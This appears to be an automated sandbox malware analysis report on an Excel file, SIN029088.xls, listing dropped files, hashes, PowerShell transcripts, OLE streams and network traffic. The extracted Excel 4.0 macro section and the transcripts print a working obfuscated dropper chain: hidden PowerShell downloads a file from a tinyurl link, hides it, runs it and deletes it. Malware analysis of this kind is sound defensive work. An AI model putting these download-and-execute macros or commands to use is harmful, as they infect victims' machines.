                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wwjtcat4.1zn.psm1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ytah55c4.ugm.psm1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0rptuzf.wgh.ps1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Wed Nov 18 09:56:47 2020, atime=Wed Nov 18 09:56:47 2020, length=12288, window=hide
                                                              Category:dropped
                                                              Size (bytes):904
                                                              Entropy (8bit):4.63842721857316
                                                              Encrypted:false
                                                              SSDEEP:12:81z00XUGuElPCH2Ygz10n/Vh+WrjAZ/2bDDLC5Lu4t2Y+xIBjKZm:81z0fgzq/FAZiDq87aB6m
                                                              MD5:28B10C6E244BD0AF3F0063F917556FB1
                                                              SHA1:DE0DC686F2DCDEE17C7E9426337E9C74094D74E8
                                                              SHA-256:8D052F0DBE66F8456FC37AB2BB6D39B30CF03522685787D571C1FF092B576A9E
                                                              SHA-512:556B6CC00CA06216F4FFB69A27A4C5E92BD0771DF4431FD9CA7DFCCE789DDF7FFE32104465E5351CC81C07DE8253F116830E16B43D5991861DD632A3472565F4
                                                              Malicious:false
                                                              Preview: L..................F........N....-..........O@.......0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..rQ.W....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.rQ.W.....S....................Er..h.a.r.d.z.....~.1.....rQ.W..Desktop.h.......Ny.rQ.W.....Y..............>......a..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......302494...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SIN029088.xls.LNK
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:43 2020, mtime=Wed Nov 18 09:56:47 2020, atime=Wed Nov 18 09:56:47 2020, length=76288, window=hide
                                                              Category:dropped
                                                              Size (bytes):2100
                                                              Entropy (8bit):4.668662461907179
                                                              Encrypted:false
                                                              SSDEEP:24:8cMhKxgzsT8AjFWDLl7aB6mycMhKxgzsT8AjFWDLl7aB6m:8cMhWrT7jioB6pcMhWrT7jioB6
                                                              MD5:B5F241B96BDE381C497109FED3FE4B99
                                                              SHA1:0E9ADB0D406153B497BA8CD4CC0FAE9E34637B99
                                                              SHA-256:802907F45947C47AC0C4B67A79BE65E6F4F0FA369CDB7E72E7E4012BD79F0B69
                                                              SHA-512:CA500CB31706572993871B0D4B704D6FBFF1EAB7760531F3D7E343281D45CB1A845A294F991511042564D58A388E7759A421EF4481E24A9BA0C9FE4AF2FB8F1C
                                                              Malicious:true
                                                              Preview: L..................F.... ....2..:...]g......]g.......*...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..rQ.W....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.rQ.W.....S....................Er..h.a.r.d.z.....~.1.....>Qzx..Desktop.h.......Ny.rQ.W.....Y..............>......r..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.....rQ.W .SIN029~1.XLS..L......>QvxrQ.W....h.........................S.I.N.0.2.9.0.8.8...x.l.s.......S...............-.......R...........>.S......C:\Users\user\Desktop\SIN029088.xls..$.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.I.N.0.2.9.0.8.8...x.l.s.........:..,.LB.)...As...`.......X.......302494...........!a..%.H.VZAj...x..-.........-..!a..%.H.VZAj...x..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..p
                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):92
                                                              Entropy (8bit):4.297473033964455
                                                              Encrypted:false
                                                              SSDEEP:3:oyBVomMjB0nMUubnMUmMjB0nMUv:dj6aMlMmaM2
                                                              MD5:563FD3352B60431A1BD337BB9BB7CD2F
                                                              SHA1:9F9DAF862930148695FC35016394908054FB6269
                                                              SHA-256:58BA83FF777990C409468F153B678CC69252F3798CE3DCF27B472E6FD782A8C8
                                                              SHA-512:1EDF09AB4D9437D62CA2F173F24913E61300977B267F6D0D3C65442C25C50D4CAA122E26DB3586868220B4E1C4EF21D62E97B895DF22905777FC0FFD5D257F0D
                                                              Malicious:false
                                                              Preview: Desktop.LNK=0..[xls]..SIN029088.xls.LNK=0..SIN029088.xls.LNK=0..[xls]..SIN029088.xls.LNK=0..
                                                              C:\Users\user\Desktop\95A10000
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:Applesoft BASIC program data, first line number 16
                                                              Category:dropped
                                                              Size (bytes):101260
                                                              Entropy (8bit):6.262270720499872
                                                              Encrypted:false
                                                              SSDEEP:3072:TMk3hbdlylKsgqopeJBWhZFGkE+cL2Nd+b4dEEwrTxJJJcMk3hbdlylKsgqopeJD:wk3hbdlylKsgqopeJBWhZFVE+W2Nd+bt
                                                              MD5:1B87A31A2BF604D932E75E952D2826C6
                                                              SHA1:0D7DAC61502F6F7594728BDD6FDF85E1AC62D78D
                                                              SHA-256:D3C005983BD1F85C63E09FE6F215D8D1A6637E2DFE45B04889428A7F7CDB2CDB
                                                              SHA-512:B8FA71B309A00FCD63B541B63F31F1E04A403B3DE996C965C970B657900DB9DF489FAE1BFE47D20910498D66501A73CA4088B0DFCC983249F309E41DA82EC862
                                                              Malicious:false
                                                              Preview: ........T8..........................\.p....pratesh B.....a.........=...........................................=.......#F..8.......X.@...........".......................1................q..A.r.i.a.l.1................q..A.r.i.a.l.1................q..A.r.i.a.l.1................q..A.r.i.a.l.1................q..A.r.i.a.l.1................q..A.r.i.a.l.1. ..............q..C.o.n.s.o.l.a.s.1................q..A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.
                                                              C:\Users\user\Documents\20201118\PowerShell_transcript.302494.3yVd2HwL.20201118025651.txt
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):3218
                                                              Entropy (8bit):5.389217953073274
                                                              Encrypted:false
                                                              SSDEEP:96:BZ6hAZNMqDo1Zz3ZphAZNMqDo1ZxavAvAbTZL:X44J
                                                              MD5:852104B539084EF1E3DDF93174181EC3
                                                              SHA1:4BF72B31FA3F9759FA84FCC15813395ED902D948
                                                              SHA-256:2947826221147697906DE98F2303FE6B488F50B23CB8AE31AA77015FBD0CEDAF
                                                              SHA-512:4E2222C3D6E9279783D13928F8779C8C8C871670C2B8D6B76C5C945DB475898C23BD2BA589C6C758170A8CCAD2DB96E3D9E5F0DC103C57B88BB7E80FE2C87B1F
                                                              Malicious:false
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20201118025721..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 302494 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 stARt`-slE`Ep 3; Move-Item pd.bat -Destination $e`nV:T`EMP..Process ID: 800..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201118025722..**********************..PS>stARt`-slE`Ep 3; Move-Item pd.bat -Destination $e`nV:T`EMP..**********************..Windows PowerShell transcript start..Start time: 20201118025814..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 302494 (Microsoft Windows NT 10.0.17134.0)..Hos
                                                              C:\Users\user\Documents\20201118\PowerShell_transcript.302494.A7RtmgRr.20201118025652.txt
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators
                                                              Category:dropped
                                                              Size (bytes):5335
                                                              Entropy (8bit):5.32619158796694
                                                              Encrypted:false
                                                              SSDEEP:96:BZPLhAZNXqDo1ZaZ7hAZNXqDo1ZnxUUdZ3hAZNXqDo1ZY/viufuf+MZV:uviufuf+o
                                                              MD5:75CC7A2D78AAFEBA31E56FE8936EB69F
                                                              SHA1:C6C4FE38ABBE331D81B745B6DC69237BA875602F
                                                              SHA-256:1D4DD3C7EAFDC8613A47A91F62532CA6F9707FEC22DE19C046005A8781C8EAD6
                                                              SHA-512:A0A7024F1AA4AFD6FE1129769F495E73353ED79C7DE91811F6B0F3DABF9E9A53F6D057AF42DB7724AD9AD468CB8EAAE6FF3533B59D62D65B0BB98D9614A01DC4
                                                              Malicious:false
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20201118025728..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 302494 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 stARt`-slE`Ep 7;cd $e`nV:T`EMP; ./pd.bat..Process ID: 4824..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201118025728..**********************..PS>stARt`-slE`Ep 7;cd $e`nV:T`EMP; ./pd.bat..**********************..Windows PowerShell transcript start..Start time: 20201118025823..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 302494 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 stAR
                                                              C:\Users\user\Documents\20201118\PowerShell_transcript.302494.O2kFUmpi.20201118025653.txt
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1055
                                                              Entropy (8bit):5.265983328597185
                                                              Encrypted:false
                                                              SSDEEP:24:BxSASxvBn/IZx2DOXBBWYHjeTKKjX4CIym1ZJXkeDnxSAZA:BZOvhAZoOaYqDYB1ZdDZZA
                                                              MD5:0BA450F0ECC741B34BE32434991CFAD2
                                                              SHA1:0A5686322206F585E316915D8B9F965DFC971EDE
                                                              SHA-256:0D83AB322321431105AAC79FDA38AB8AEF918F0CCD70DD2F61395A108B24B881
                                                              SHA-512:1D14E0DEF00F01DCBCC97D24299841BC7CE1AAC799E076D5E42FAD923B8D8BD23BB9051F16DECAC30B1F1AF7CBA0E36BE68DE82B89C2C92F20E7A6FEA4AF31C3
                                                              Malicious:false
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20201118025729..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 302494 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').Invoke('https://tinyurl.com/y252oqq3','pd.bat')..Process ID: 5344..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201118025730..**********************..PS>(nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').Invoke('https://tinyurl.com/y252oqq3','pd.bat')..**********************..Command start time: 20201118025820..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript
                                                              C:\Users\user\Documents\20201118\PowerShell_transcript.302494.YCCuFHw+.20201118025651.txt
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):959
                                                              Entropy (8bit):5.054220270153939
                                                              Encrypted:false
                                                              SSDEEP:24:BxSAa0ixvBn/IZx2DOXJuzWQHjeTKKjX4CIym1ZJXPFJnxSAZe:BZa0evhAZoOZZQqDYB1Z5nZZe
                                                              MD5:E3A6FB50DC898FFD7885F9B485E073BC
                                                              SHA1:617B4B89C87EE55E7A974AC4DF1681B1CB9FDFB7
                                                              SHA-256:F4AC5E15B55499EB54E51F080E018EB5506D75A75DDB9778EF7AD76C3D267F2C
                                                              SHA-512:45A9E6D72412214343F92096AE301C84B7AA695035FC909D8D0D8B32E20D8493374C2BC43479D37706CD954991895A4951E54963B61DA6C54E9D4A7156FBF2EB
                                                              Malicious:false
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20201118025727..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 302494 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat..Process ID: 912..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201118025728..**********************..PS>stARt`-slE`Ep 1; attrib +s +h pd.bat..File not found - pd.bat..**********************..Command start time: 20201118025815..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20201118025816..**********************..
                                                              C:\Users\user\Documents\20201118\PowerShell_transcript.302494.y+93if3U.20201118025652.txt
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):961
                                                              Entropy (8bit):5.0720039684440215
                                                              Encrypted:false
                                                              SSDEEP:24:BxSA+xvBn/IZx2DOXJYFWWWHjeTKKjX4CIym1ZJXkWYFTnxSAZ7:BZ6vhAZoOZ6RWqDYB1ZuW6zZZ7
                                                              MD5:3712DE78482853E74F6ADE8EBAA13916
                                                              SHA1:7EC98DBE2F925FE9FB85FAF035FA99DF2BE4108F
                                                              SHA-256:AC9007F7FE67755D287B8B0B03CA314038D3B1F4AD991829CD7B524EFF730B35
                                                              SHA-512:905B2DDC17D60926D70E709F7515D68F1154EA308A87ED047A2036FFD5E68DF137605F55BE955E32852169A1BA33E4251AB0B49FB34894FE5A968C1667EB9943
                                                              Malicious:false
                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20201118025725..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 302494 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force..Process ID: 1720..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201118025726..**********************..PS>stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force..**********************..Command start time: 20201118025826..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20201118025826..**********************..
                                                              C:\Users\user\Documents\pd.bat
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:HTML document, ASCII text
                                                              Category:dropped
                                                              Size (bytes):4606
                                                              Entropy (8bit):4.92124169787845
                                                              Encrypted:false
                                                              SSDEEP:96:+fuXZjJOJvz06mJWai5hLBBDu8FeGcOsutscRtKLYQfqp:fZ1mvzmo5hLBBy8FeGcOsuqoKLVfqp
                                                              MD5:4D9C00D079A92415926144B2C8691B13
                                                              SHA1:56C897DEC2400C319B0F807578B197C3325D66B1
                                                              SHA-256:46795C4CCB8D61A2C9211EE9180F81885AC02E02980095CAECCF853CFD25873A
                                                              SHA-512:000B186FFB5E168EC7C68BA838197EB5CC4EF29C0EA9B5B7EC4CE8B200305CE9BB25683C7091437F7F962B3A90211AC9960BA1EFC67AA34628C3366BD7AAF13F
                                                              Malicious:false
                                                              Preview: <!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. [if IE]><meta http-equiv='X-UA-Compatible' content='IE=edge,chrome=1'><![endif]-->.<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">.<title>TinyURL.com - shorten that long URL into a tiny URL</title>.<base href="https://tinyurl.com/">.<meta name="description" content="TinyURL.com is the original URL shortener that shortens your unwieldly links into more manageable and useable URLs.">.<meta name="keywords" content="tinyurl url save share shorten analyze">.<link rel="shortcut icon" href="https://tinyurl.com/favicon.ico" type="image/gif">. <style type="text/css">. . body {. color : Black;. background-color : #CCCCFF;. font-family : Verdana, Geneva, Arial, Helvetica, sans-serif;. }.. td {. font-size : 80%;. color : Black;. font-family : Verdana, Geneva, Arial, Hel

                                                              Static File Info

                                                              General

                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: Dexter MORGAN, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Sat Oct 31 02:12:40 2020, Security: 1, Author: Dexter MORGAN
                                                              Entropy (8bit):6.756732735024043
                                                              TrID:
                                                              • Microsoft Excel sheet (30009/1) 78.94%
                                                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                              File name:SIN029088.xls
                                                              File size:69120
                                                              MD5:483a0f4cb6a70556b34aed04f24f7962
                                                              SHA1:cbd6b0004aca06a46b4863bfbc13f444b3404483
                                                              SHA256:ccab18c2ba789320bdb50d364ce3f70a625c60c68a93ad05bbca056f9f6f821a
                                                              SHA512:6c5bfee4f94df52461a6fbf56bdd41903c866aba02b03a428db6a95dfedadec41c8912e1de21d57358fe308eaf3428ceeadc5b08ee5d3d85eb4a701a214e0ff8
                                                              SSDEEP:1536:oMnSGiysRchNXHfA1MiWhZFGkEld+Dr7FjmSb4wIE7zp0RhBv1hQz7rT01Bf:oMnSGiysRchNXHfA1MiWhZFGkEld+Dre
                                                              File Content Preview:........................;......................................................................................................................................................................................................................................

                                                              File Icon

                                                              Icon Hash:74ecd4c6c3c6c4d8

                                                              Static OLE Info

                                                              General

                                                              Document Type:OLE
                                                              Number of OLE Files:1

                                                              OLE File "SIN029088.xls"

                                                              Indicators

                                                              Has Summary Info:True
                                                              Application Name:unknown
                                                              Encrypted Document:False
                                                              Contains Word Document Stream:False
                                                              Contains Workbook/Book Stream:True
                                                              Contains PowerPoint Document Stream:False
                                                              Contains Visio Document Stream:False
                                                              Contains ObjectPool Stream:
                                                              Flash Objects Count:
                                                              Contains VBA Macros:True

                                                              Summary

                                                              Code Page:1252
                                                              Author:Dexter MORGAN
                                                              Last Saved By:Dexter MORGAN
                                                              Create Time:2020-09-20 21:17:44
                                                              Last Saved Time:2020-10-31 02:12:40
                                                              Security:1

                                                              Document Summary

                                                              Document Code Page:1252
                                                              Thumbnail Scaling Desired:False
                                                              Contains Dirty Links:False
                                                              Shared Document:False
                                                              Changed Hyperlinks:False
                                                              Application Version:1048576

                                                              Streams

                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276
                                                              General
                                                              Stream Path:\x5DocumentSummaryInformation
                                                              File Type:data
                                                              Stream Size:276
                                                              Entropy:3.16930549839
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . . . . . . . . . . . . . . . . . M a c r o
                                                              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00
                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 192
                                                              General
                                                              Stream Path:\x5SummaryInformation
                                                              File Type:data
                                                              Stream Size:192
                                                              Entropy:3.49624442174
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . D e x t e r M O R G A N . . . @ . . . . L . z . . . . @ . . . . . O + . . . . . . . . . . . . . . . . . . . D e x t e r M O R G A N . . .
                                                              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 90 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 0c 00 00 00 58 00 00 00 0d 00 00 00 64 00 00 00 13 00 00 00 70 00 00 00 04 00 00 00 78 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0e 00 00 00 44 65 78 74 65 72 20 4d
                                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 66020
                                                              General
                                                              Stream Path:Workbook
                                                              File Type:Applesoft BASIC program data, first line number 16
                                                              Stream Size:66020
                                                              Entropy:6.85011092869
                                                              Base64 Encoded:True
                                                              Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . D e x t e r M O R G A N B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . # F . . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
                                                              Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 0d 00 00 44 65 78 74 65 72 20 4d 4f 52 47 41 4e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                              Macro 4.0 Code

                                                              ;;;;;;"=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&""wer^she""&CHAR(108)&CHAR(108)&CHAR(32)&"" -w 1 stARt`-slE`Ep 3; Move-Item """"pd.bat"""" -Destination """"$e`nV:T`EMP"""""")";;;;;;;;;;;;"=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&""wer^she""&CHAR(108)&CHAR(108)&CHAR(32)&"" -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force"")";;;;;;"=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&""wer^she""&CHAR(108)&CHAR(108)&CHAR(32)&"" -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat"")";;;;;;"=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&""wer^she""&CHAR(108)&CHAR(108)&CHAR(32)&"" -w 1 stARt`-slE`Ep 7;cd """"$e`nV:T`EMP; ./pd.bat"""""")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;"=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&""wer^she""&CHAR(108)&CHAR(108)&CHAR(32)&"" -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').""""Invoke""""('https://tinyurl.com/y252oqq3','pd.bat')"")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;=PAUSE()

                                                              Network Behavior

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 18, 2020 02:58:20.113071918 CET49688443192.168.2.3104.20.139.65
